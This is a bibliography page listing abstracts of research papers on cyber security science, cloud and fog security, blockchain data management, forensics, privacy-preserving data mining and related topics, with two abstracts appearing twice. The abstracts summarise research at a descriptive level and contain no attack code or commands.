Biblio
This paper describes a data driven approach to studying the science of cyber security (SoS). It argues that science is driven by data. It then describes issues and approaches towards the following three aspects: (i) Data Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-based Sharing, and (iii) A Risk-based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.
Large scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes them difficult to secure applications running within. We motivate this setting using a real world complex scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies, from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, challenges of evaluation, and describe some of the approaches we have found promising.
In this study, we are using a multi-party recording as a template for building a parametric speech synthesiser which is able to express different levels of attentiveness in backchannel tokens. This allowed us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised than in natural backchannels; ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.
Smart grids technologies are enablers of new business models for domestic consumers with local flexibility (generation, loads, storage) and where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and exchange models instead of personal data. This paper describes the functional architecture of an home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, are discussed for improving renewable energy forecasting skill and modeling multi-period flexibility of distributed energy resources.
Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.
This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.
As consequences of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.
To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.
Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.
In the cyber crime huge log data, transactional data occurs which tends to plenty of data for storage and analyze them. It is difficult for forensic investigators to play plenty of time to find out clue and analyze those data. In network forensic analysis involves network traces and detection of attacks. The trace involves an Intrusion Detection System and firewall logs, logs generated by network services and applications, packet captures by sniffers. In network lots of data is generated in every event of action, so it is difficult for forensic investigators to find out clue and analyzing those data. In network forensics is deals with analysis, monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and web browser. The FTK 4.0 is discussing for memory forensic analysis and remote system forensic which is to be used as evidence for aiding investigation.
We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
Deregulated electricity markets rely on a two-settlement system consisting of day-ahead and real-time markets, across which electricity price is volatile. In such markets, locational marginal pricing is widely adopted to set electricity prices and manage transmission congestion. Locational marginal prices are vulnerable to measurement errors. Existing studies show that if the adversaries are omniscient, they can design profitable attack strategies without being detected by the residue-based bad data detectors. This paper focuses on a more realistic setting, in which the attackers have only partial and imperfect information due to their limited resources and restricted physical access to the grid. Specifically, the attackers are assumed to have uncertainties about the state of the grid, and the uncertainties are modeled stochastically. Based on this model, this paper offers a framework for characterizing the optimal stochastic guarantees for the effectiveness of the attacks and the associated pricing impacts.
Cyber infrastructures are highly vulnerable to intrusions and other threats. The main challenges in cloud computing are failure of data centres and recovery of lost data and providing a data security system. This paper has proposed a Virtualization and Data Recovery to create a virtual environment and recover the lost data from data servers and agents for providing data security in a cloud environment. A Cloud Manager is used to manage the virtualization and to handle the fault. Erasure code algorithm is used to recover the data which initially separates the data into n parts and then encrypts and stores in data servers. The semi trusted third party and the malware changes made in data stored in data centres can be identified by Artificial Intelligent methods using agents. Java Agent Development Framework (JADE) is a tool to develop agents and facilitates the communication between agents and allows the computing services in the system. The framework designed and implemented in the programming language JAVA as gateway or firewall to recover the data loss.
Existing data management and searching system for Internet of Things uses centralized database. For this reason, security vulnerabilities are found in this system which consists of server such as IP spoofing, single point of failure and Sybil attack. This paper proposes data management system is based on blockchain which ensures security by using ECDSA digital signature and SHA-256 hash function. Location that is indicated as IP address of data owner and data name are transcribed in block which is included in the blockchain. Furthermore, we devise data manegement and searching method through analyzing block hash value. By using security properties of blockchain such as authentication, non-repudiation and data integrity, this system has advantage of security comparing to previous data management and searching system using centralized database or P2P networks.
Supply chain management (SCM) is fundamental for gaining financial, environmental and social benefits in the supply chain industry. However, traditional SCM mechanisms usually suffer from a wide scope of issues such as lack of information sharing, long delays for data retrieval, and unreliability in product tracing. Recent advances in blockchain technology show great potential to tackle these issues due to its salient features including immutability, transparency, and decentralization. Although there are some proof-of-concept studies and surveys on blockchain-based SCM from the perspective of logistics, the underlying technical challenges are not clearly identified. In this paper, we provide a comprehensive analysis of potential opportunities, new requirements, and principles of designing blockchain-based SCM systems. We summarize and discuss four crucial technical challenges in terms of scalability, throughput, access control, data retrieval and review the promising solutions. Finally, a case study of designing blockchain-based food traceability system is reported to provide more insights on how to tackle these technical challenges in practice.
Expectation of cryptocurrencies has been increased rapidly and all of these cryptocurrencies are generated on blockchain platform. This means not only the paradigm is changing in the field of finance but also the blockchain platform is technically stable. Based on the stability of blockchain, many kind of crypto currencies or application platforms are being implemented or released and world famous banks are applying blockchain on their financial service[1]. Even law for exchanging cryptocurrencies is being discussed. Furthermore, blockchain platforms also run programmed source code which is called as smart contract on its distributed platform. Smart contract extends usage of blockchain platform. So in this paper, we propose an algorithm for recording and managing location data of IoT service provider and user based on blockchain with smart contract. Our proposal records data of participants in network by blockchain which ensures security and match with other optimized participant by spatial data processing.
With the arrival of the big data era, information privacy and security issues become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data mining approaches for privacy preserving association rules. The MASK algorithm only adopts a data perturbation strategy, which leads to a low privacy-preserving degree. Moreover, it is difficult to apply the MASK algorithm into practices because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) to improve the privacy-preserving degree by multi-parameters perturbation. In order to improve the time-efficiency, the calculation to obtain an inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization is provided to reduce the number of scanning database by set theory. Both theoretical analyses and experiment results prove that the proposed DPQR algorithm has better performance.
With the arrival of the big data era, information privacy and security issues become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data mining approaches for privacy preserving association rules. The MASK algorithm only adopts a data perturbation strategy, which leads to a low privacy-preserving degree. Moreover, it is difficult to apply the MASK algorithm into practices because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) to improve the privacy-preserving degree by multi-parameters perturbation. In order to improve the time-efficiency, the calculation to obtain an inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization is provided to reduce the number of scanning database by set theory. Both theoretical analyses and experiment results prove that the proposed DPQR algorithm has better performance.
As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely-used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats that each mitigates. Our performance evaluation shows that these security features have an acceptable cost-in some cases, within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experiences from contributing these features to OpenStack as a way to encourage others to transition their research into practice.
Cloud computing has established itself as an alternative IT infrastructure and service model. However, as with all logically centralized resource and service provisioning infrastructures, cloud does not handle well local issues involving a large number of networked elements (IoTs) and it is not responsive enough for many applications that require immediate attention of a local controller. Fog computing preserves many benefits of cloud computing and it is also in a good position to address these local and performance issues because its resources and specific services are virtualized and located at the edge of the customer premise. However, data security is a critical challenge in fog computing especially when fog nodes and their data move frequently in its environment. This paper addresses the data protection and the performance issues by 1) proposing a Region-Based Trust-Aware (RBTA) model for trust translation among fog nodes of regions, 2) introducing a Fog-based Privacy-aware Role Based Access Control (FPRBAC) for access control at fog nodes, and 3) developing a mobility management service to handle changes of users and fog devices' locations. The implementation results demonstrate the feasibility and the efficiency of our proposed framework.
Cloud forensics investigates the crime committed over cloud infrastructures like SLA-violations and storage privacy. Cloud storage forensics is the process of recording the history of the creation and operations performed on a cloud data object and investing it. Secure data provenance in the Cloud is crucial for data accountability, forensics, and privacy. Towards this, we present a Cloud-based data provenance framework using Blockchain, which traces data record operations and generates provenance data. Initially, we design a dropbox like application using AWS S3 storage. The application creates a cloud storage application for the students and faculty of the university, thereby making the storage and sharing of work and resources efficient. Later, we design a data provenance mechanism for confidential files of users using Ethereum blockchain. We also evaluate the proposed system using performance parameters like query and transaction latency by varying the load and number of nodes of the blockchain network.
Multi-agent simulations are useful for exploring collective patterns of individual behavior in social, biological, economic, network, and physical systems. However, there is no provenance support for multi-agent models (MAMs) in a distributed setting. To this end, we introduce ProvMASS, a novel approach to capture provenance of MAMs in a distributed memory by combining inter-process identification, lightweight coordination of in-memory provenance storage, and adaptive provenance capture. ProvMASS is built on top of the Multi-Agent Spatial Simulation (MASS) library, a framework that combines multi-agent systems with large-scale fine-grained agent-based models, or MAMs. Unlike other environments supporting MAMs, MASS parallelizes simulations with distributed memory, where agents and spatial data are shared application resources. We evaluate our approach with provenance queries to support three use cases and performance measures. Initial results indicate that our approach can support various provenance queries for MAMs at reasonable performance overhead.
In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents and mitigation strategies results from the organizations' growing need to protect against today's sophisticated cyber attacks. To investigate data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing and storing data. As expected, the study finds that the main factors that affect shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants.Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues – particularly related to scalability and data source integration – deserve particular attention.